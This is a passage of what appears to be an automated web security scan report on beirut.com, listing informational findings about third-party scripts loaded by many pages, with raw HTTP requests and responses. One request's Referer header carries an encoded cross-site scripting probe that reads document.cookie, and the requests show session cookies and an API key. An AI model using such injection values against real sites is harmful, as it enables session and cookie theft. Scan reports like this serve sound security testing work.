User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:41:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.571. http://www.beirut.com/Hotels/3-Stars/3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/3-Stars/3

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Hotels/3-Stars/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:43:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.572. http://www.beirut.com/Hotels/4-Stars/4

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/4-Stars/4

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Hotels/4-Stars/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:44:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.573. http://www.beirut.com/Hotels/5-Stars/5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Hotels/5-Stars/5

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Hotels/5-Stars/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:46:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.574. http://www.beirut.com/Index/Error

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Index/Error

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Index/Error HTTP/1.1
Host: www.beirut.com
Proxy-Connection: keep-alive
Referer: http://www.beirut.com/css/blue/4429e%2527%253balert%2528document.cookie%2529%252f%252f59f8c7185c5/search-btn.gif
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:13:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 62547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.575. http://www.beirut.com/JustForKids/Educational/9-service

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Educational/9-service

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /JustForKids/Educational/9-service HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:58:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.576. http://www.beirut.com/JustForKids/Gatherings/14-event

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Gatherings/14-event

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /JustForKids/Gatherings/14-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:23:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.577. http://www.beirut.com/JustForKids/Recreation-and-Fun/11-locale

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Recreation-and-Fun/11-locale

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /JustForKids/Recreation-and-Fun/11-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:29:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.578. http://www.beirut.com/JustForKids/Shops/8-locale

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Shops/8-locale

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /JustForKids/Shops/8-locale HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:29:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61588

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.579. http://www.beirut.com/JustForKids/Sports/1-event

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /JustForKids/Sports/1-event

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /JustForKids/Sports/1-event HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:31:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54649

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.580. http://www.beirut.com/Loans

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Loans

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Loans HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:39:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.581. http://www.beirut.com/Movie-Theaters/5

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movie-Theaters/5

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movie-Theaters/5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:26:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57058

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.582. http://www.beirut.com/Movies

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Movies

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Movies HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:43:02 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63068

